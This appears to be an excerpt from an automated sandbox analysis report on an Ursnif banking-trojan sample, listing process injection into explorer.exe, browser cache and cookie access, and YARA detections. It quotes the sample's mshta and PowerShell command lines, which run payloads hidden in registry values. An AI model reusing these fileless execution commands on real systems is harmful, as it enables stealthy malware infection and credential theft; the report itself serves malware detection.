Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00477AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_00477AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02359B00 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_02359B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234E8CE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_0234E8CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349945 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_02349945
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349F54 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_02349F54
Source: C:\Windows\explorer.exe Code function: 28_2_0291EEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 28_2_0291EEAC
Source: C:\Windows\explorer.exe Code function: 28_2_0291537C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 28_2_0291537C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234BB01 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 4_2_0234BB01
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A1078 GetSystemInfo, 4_2_003A1078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: control.exe, 0000001A.00000003.2385378340.00000000000DC000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234F304 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 4_2_0234F304
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235FEA3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_0235FEA3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B72C4 ConvertStringSecurityDescriptorToSecurityDescriptorA,RtlAddVectoredExceptionHandler, 20_2_028B72C4
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vl8o3v8u.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 76F819A0
Hijacks the control flow in another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 76F819A0 value: FF
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 76F819A0 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 2560000 value: A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 76F819A0 value: FF
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1388
Source: C:\Windows\explorer.exe Thread register set: target process: 3060
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: FFF12E54 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: FFF12E54 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 76F819A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2560000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 76F819A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6C1D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC6C1C.tmp'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8BAE.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8BAD.tmp'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47278A61-FA3B-119B-3C6B-CED530CFE2D9\\\CRPPcapi'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047A446 cpuid 4_2_0047A446
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003853A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP, 4_2_0038C3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_0038ADFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_0038AE48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003854AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_00385C98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_00385C96
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234DEE0 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 4_2_0234DEE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003898C8 GetLocalTime, 4_2_003898C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047A446 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 4_2_0047A446
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00431146 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 4_2_00431146
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settings
Source: C:\Windows\explorer.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Searches for Windows Mail specific files
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account<.oeaccount
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\59C02561138E71C7237CBC3288BF172D8DF80F79
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CD054398D4C8F7E0F984E5C9895F3CE31CC87DD9
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B32C5865A88F2CD8FDBF2030BCB0763B059A1088
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\1CA6B5DA175F6418512B23A5A017803597A480EB
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\34DC0D4BCA039E40FAC014DB99C037C817105B9F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\065910A062E51C85C91C2EE807B329EFE5711F5C
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\649FFC13DDEC1DBA9F414E044964903168569E56
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\0B42EA5C9D9EFD01C140C78669B38B9FE2EC7FF9
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B22D1793116439B747286991833479A623FC4674
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6D7AC0B3D4DAC40D7A42CBE0FCCD3EF6B2BB312
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\77BEB77D9CC969C39958CC4A5EBACAF025E09EA4
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\08A8D56DDA6D87D47C4B2F4F1B528495275BC613
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6917E8702435738DCE3CD40A6F91B6122C65D11
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B7DB036074231ACC212F58CA5B8AF0545A418060
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CBE7F0D75353AA4E35CB585DED5088B5BB2CA08A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AE22A0F0A82489CB8E655FC2818819FA91DD2B8A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\1074F7817233D871CC944D502A9577E43F08D441
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F6C123BA9B7A4F6A8BB0350975A5AA2D99CD4B8D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\C4CE867FE0AA83CF617E1E53F7AD2BEF93EE104F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B6DA8786A7D636181A70911A15213BBCA7152383
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\BCB517001182874C3EE3D0BC6D29EAF91EE374DB
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B45AEF301B9732B10C16E5E8B0DBEA59D1B69AD1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\70C2F191395AE2444F6C418256D93D799A956A90
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\2C1C3006E308780316B46ECD995A5336C781BEE6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\7DBD6E5E66612FF568AC1DAE7D6AC74339D3042A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\FF0B833C30069A3BC4E969366182DFE389B5A270
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6525701412DDA4A90A6A63D90D00E4C9159AEAC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5F48FAABC36B7B66AAC3820F4C14377E7CE7AF5C
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\58CCEC10476E9CB5DA9CE3FF0AF5992D809E237E
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AAB980CEA9A2C2CD649588DC3DE613F3AB65EFF8
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\8E791F7BE2E3E2019DC6B755A143896278E03C07
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\58A0FB92CAE6B02B4582D904EEC431CBB6B5E40A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5B9196645BD157422AF27C7DAA67799558B3FDF3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\4ED140178E492EA87CC63B79854E2794790379DF
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\3E538CAC2C914514ECC5B580E31B0737FF540EB1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F05AA1EFF89E0FD1AC143555DFC77620967E6322
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AA369978819D108BB5DE6FECD6B74914FE7ABAEC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\1AD79CD9E352B4D21302A1BC230FE9EB0CEAB7CC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\A7917C54721C7E3C9AAFE4198A84F6F2EC3CA3E0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\EFAF9EB99E327835B6967A4E9F5034990DF6B1B8
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\3835EDD8701D457A3875F88E6675215A0AA3E0AF
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\BA5B00FE10C66B51AE0A363E2D5F1B4E065442C6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\8E68C7016C8759B0ACAD6457BC74279D20949B81
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D99D23F5F3F259C7157F3A35B594FF8A1B4F423F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\333121A7E00FDA6F4294B140CFDA07F2D535F196
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\0FE7E01D07E074CEFEED27C015D1547B9354372D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\6C6FC58E102CACB06D13B3875A2BD07C1426EBD6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\DB11BB04DBABBEED1877D68FDFB7B20A20F3D7A1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\DDB36231816DC2568B9A92F175CA0175D5255B6D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AD723E2A38015428896DFDC95ED19ACE3C651918
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\D74761D73B3FE6877898A5D6E1AB6B5BA566BD84
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\013291A16EA8E3175CFC06D53A8C2B8141DD6F17
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\96B7A43304E9646262F1142854470CA1F53426AC
